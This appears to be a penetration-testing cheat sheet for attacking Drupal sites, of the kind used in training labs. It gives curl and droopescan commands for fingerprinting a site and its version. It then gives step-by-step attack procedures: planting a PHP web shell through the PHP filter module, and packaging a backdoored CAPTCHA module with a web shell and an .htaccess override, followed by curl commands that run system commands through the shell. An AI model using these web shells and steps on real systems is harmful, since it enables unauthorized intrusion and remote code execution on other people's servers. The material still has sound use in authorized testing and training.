Drupal
Footprinting and Enumeration
# Confirming site is running Drupal
curl -s <http://drupalsite.local> | grep Drupal
# Find Version
curl -s <http://drupalsite.local/CHANGELOG.txt> | grep -m2 ""
Droopscan
# Normal scan with droopscan
droopescan scan drupal -u <http://drupalsite.local>
Attacking Drupal
Code Execution
# FOR UPTO VERSION 8, from version 8 onwards, php filter module is not installed by default, We can install PHP filter module ourselves
# We can get code execution by writing php web shell into php filter module
# md5 Encoded parameter for cmd in php web shell
<?php
system($_GET['dcfdd5e021a869fcc6dfaef8bf31377e']);
?>
# Executing commands using curl
curl -s <http://drupalsite.local/node/3?dcfdd5e021a869fcc6dfaef8bf31377e=id> | grep uid | cut -f4 -d">"
Uploading a Backdoored Module
# Download any module from drupal site like CAPTCHA
wget --no-check-certificate <https://ftp.drupal.org/files/projects/captcha-8.x-1.2.tar.gz>
tar xvf captcha-8.x-1.2.tar.gz
# Create a PHP web shell with the contents:
<?php
system($_GET[fe8edbabc5c5c9b7b764504cd22b17af]);
?>
# Next, we need to create a .htaccess file to give ourselves access to the folder. This is necessary as Drupal denies direct access to the /modules folder.
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
</IfModule>
# Copy both of these files to the captcha folder and create an archive.
mv shell.php .htaccess captcha
tar cvf captcha.tar.gz captcha/
# Install the module on page : <http://drupal.inlanefreight.local/admin/modules/install>
# After successful installation, , browse to /modules/captcha/shell.php to execute commands.
curl -s drupalsite.local/modules/captcha/shell.php?fe8edbabc5c5c9b7b764504cd22b17af=id
Last updated